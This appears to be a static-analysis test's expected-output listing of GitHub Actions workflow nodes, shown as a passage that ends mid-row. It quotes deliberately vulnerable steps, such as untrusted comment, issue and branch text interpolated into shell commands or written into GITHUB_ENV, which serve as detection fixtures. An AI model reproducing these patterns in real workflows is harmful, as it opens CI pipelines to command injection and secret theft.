.github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -argumentNodes -| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -usesIds -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | -nodeLocations -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:9:5:89:35 | .github/workflows/multiline2.yml@9:5:89:35 | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:9:15:6 | .github/workflows/multiline2.yml@11:9:15:6 | -| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:14:33:14 | .github/workflows/multiline2.yml@30:14:33:14 | -| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:32:13:32:39 | .github/workflows/multiline2.yml@32:13:32:39 | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:9:40:6 | .github/workflows/multiline2.yml@34:9:40:6 | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:35:14:39:14 | .github/workflows/multiline2.yml@35:14:39:14 | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:9:46:6 | .github/workflows/multiline2.yml@40:9:46:6 | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:41:14:45:14 | .github/workflows/multiline2.yml@41:14:45:14 | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:9:52:6 | .github/workflows/multiline2.yml@46:9:52:6 | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:47:14:51:14 | .github/workflows/multiline2.yml@47:14:51:14 | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:9:58:6 | .github/workflows/multiline2.yml@52:9:58:6 | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:53:14:57:14 | .github/workflows/multiline2.yml@53:14:57:14 | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:9:63:6 | .github/workflows/multiline2.yml@58:9:63:6 | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:59:14:62:14 | .github/workflows/multiline2.yml@59:14:62:14 | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:9:66:6 | .github/workflows/multiline2.yml@63:9:66:6 | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:64:14:65:142 | .github/workflows/multiline2.yml@64:14:65:142 | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:9:71:6 | .github/workflows/multiline2.yml@66:9:71:6 | -| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:9:34:6 | .github/workflows/multiline.yml@30:9:34:6 | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:9:40:6 | .github/workflows/multiline.yml@34:9:40:6 | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:35:14:39:14 | .github/workflows/multiline.yml@35:14:39:14 | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:9:46:6 | .github/workflows/multiline.yml@40:9:46:6 | -| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:41:14:45:14 | .github/workflows/multiline.yml@41:14:45:14 | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:9:52:6 | .github/workflows/multiline.yml@46:9:52:6 | -| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:47:14:51:14 | .github/workflows/multiline.yml@47:14:51:14 | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:9:58:6 | .github/workflows/multiline.yml@52:9:58:6 | -| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:53:14:57:14 | .github/workflows/multiline.yml@53:14:57:14 | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:9:63:6 | .github/workflows/multiline.yml@58:9:63:6 | -| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:59:14:62:14 | .github/workflows/multiline.yml@59:14:62:14 | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:9:66:6 | .github/workflows/multiline.yml@63:9:66:6 | -| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:64:14:65:136 | .github/workflows/multiline.yml@64:14:65:136 | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:9:71:6 | .github/workflows/multiline.yml@66:9:71:6 | -| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:67:14:70:36 | .github/workflows/multiline.yml@67:14:70:36 | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:9:78:6 | .github/workflows/multiline.yml@71:9:78:6 | -| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:72:14:77:29 | .github/workflows/multiline.yml@72:14:77:29 | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:9:85:6 | .github/workflows/multiline.yml@78:9:85:6 | -| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | -| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:46:111 | .github/workflows/poisonable_steps.yml@5:5:46:111 | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | -| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:11:53:11:75 | .github/workflows/poisonable_steps.yml@11:53:11:75 | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:9:14:6 | .github/workflows/poisonable_steps.yml@13:9:14:6 | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:14:13:32 | .github/workflows/poisonable_steps.yml@13:14:13:32 | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:9:15:6 | .github/workflows/poisonable_steps.yml@14:9:15:6 | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:14:14:42 | .github/workflows/poisonable_steps.yml@14:14:14:42 | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:9:16:6 | .github/workflows/poisonable_steps.yml@15:9:16:6 | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:14:15:41 | .github/workflows/poisonable_steps.yml@15:14:15:41 | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:9:17:6 | .github/workflows/poisonable_steps.yml@16:9:17:6 | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:14:16:42 | .github/workflows/poisonable_steps.yml@16:14:16:42 | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:9:18:6 | .github/workflows/poisonable_steps.yml@17:9:18:6 | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:14:17:32 | .github/workflows/poisonable_steps.yml@17:14:17:32 | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:9:19:6 | .github/workflows/poisonable_steps.yml@18:9:19:6 | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:14:18:36 | .github/workflows/poisonable_steps.yml@18:14:18:36 | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:9:20:6 | .github/workflows/poisonable_steps.yml@19:9:20:6 | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:14:19:44 | .github/workflows/poisonable_steps.yml@19:14:19:44 | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:9:21:6 | .github/workflows/poisonable_steps.yml@20:9:21:6 | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:14:20:56 | .github/workflows/poisonable_steps.yml@20:14:20:56 | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:9:22:6 | .github/workflows/poisonable_steps.yml@21:9:22:6 | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:14:21:56 | .github/workflows/poisonable_steps.yml@21:14:21:56 | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:14:22:40 | .github/workflows/poisonable_steps.yml@22:14:22:40 | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:9:24:6 | .github/workflows/poisonable_steps.yml@23:9:24:6 | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:14:23:50 | .github/workflows/poisonable_steps.yml@23:14:23:50 | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:9:25:6 | .github/workflows/poisonable_steps.yml@24:9:25:6 | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:14:24:29 | .github/workflows/poisonable_steps.yml@24:14:24:29 | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:9:26:6 | .github/workflows/poisonable_steps.yml@25:9:26:6 | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:14:25:73 | .github/workflows/poisonable_steps.yml@25:14:25:73 | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:9:27:6 | .github/workflows/poisonable_steps.yml@26:9:27:6 | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:14:26:78 | .github/workflows/poisonable_steps.yml@26:14:26:78 | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:9:28:6 | .github/workflows/poisonable_steps.yml@27:9:28:6 | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:9:30:6 | .github/workflows/poisonable_steps.yml@29:9:30:6 | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | .github/workflows/poisonable_steps.yml@29:14:29:42 | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:9:31:6 | .github/workflows/poisonable_steps.yml@30:9:31:6 | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:14:30:46 | .github/workflows/poisonable_steps.yml@30:14:30:46 | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:9:32:6 | .github/workflows/poisonable_steps.yml@31:9:32:6 | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:14:31:44 | .github/workflows/poisonable_steps.yml@31:14:31:44 | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:9:33:6 | .github/workflows/poisonable_steps.yml@32:9:33:6 | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:14:32:44 | .github/workflows/poisonable_steps.yml@32:14:32:44 | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:9:34:6 | .github/workflows/poisonable_steps.yml@33:9:34:6 | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:14:33:35 | .github/workflows/poisonable_steps.yml@33:14:33:35 | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:9:35:6 | .github/workflows/poisonable_steps.yml@34:9:35:6 | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:14:34:52 | .github/workflows/poisonable_steps.yml@34:14:34:52 | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:9:36:6 | .github/workflows/poisonable_steps.yml@35:9:36:6 | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:14:35:26 | .github/workflows/poisonable_steps.yml@35:14:35:26 | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:9:37:6 | .github/workflows/poisonable_steps.yml@36:9:37:6 | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:14:36:86 | .github/workflows/poisonable_steps.yml@36:14:36:86 | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:9:38:6 | .github/workflows/poisonable_steps.yml@37:9:38:6 | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:14:37:51 | .github/workflows/poisonable_steps.yml@37:14:37:51 | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:9:39:6 | .github/workflows/poisonable_steps.yml@38:9:39:6 | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:9:42:6 | .github/workflows/poisonable_steps.yml@41:9:42:6 | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:9:46:111 | .github/workflows/poisonable_steps.yml@42:9:46:111 | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:14:46:111 | .github/workflows/poisonable_steps.yml@42:14:46:111 | -| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:44:32:44:50 | .github/workflows/poisonable_steps.yml@44:32:44:50 | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | -| 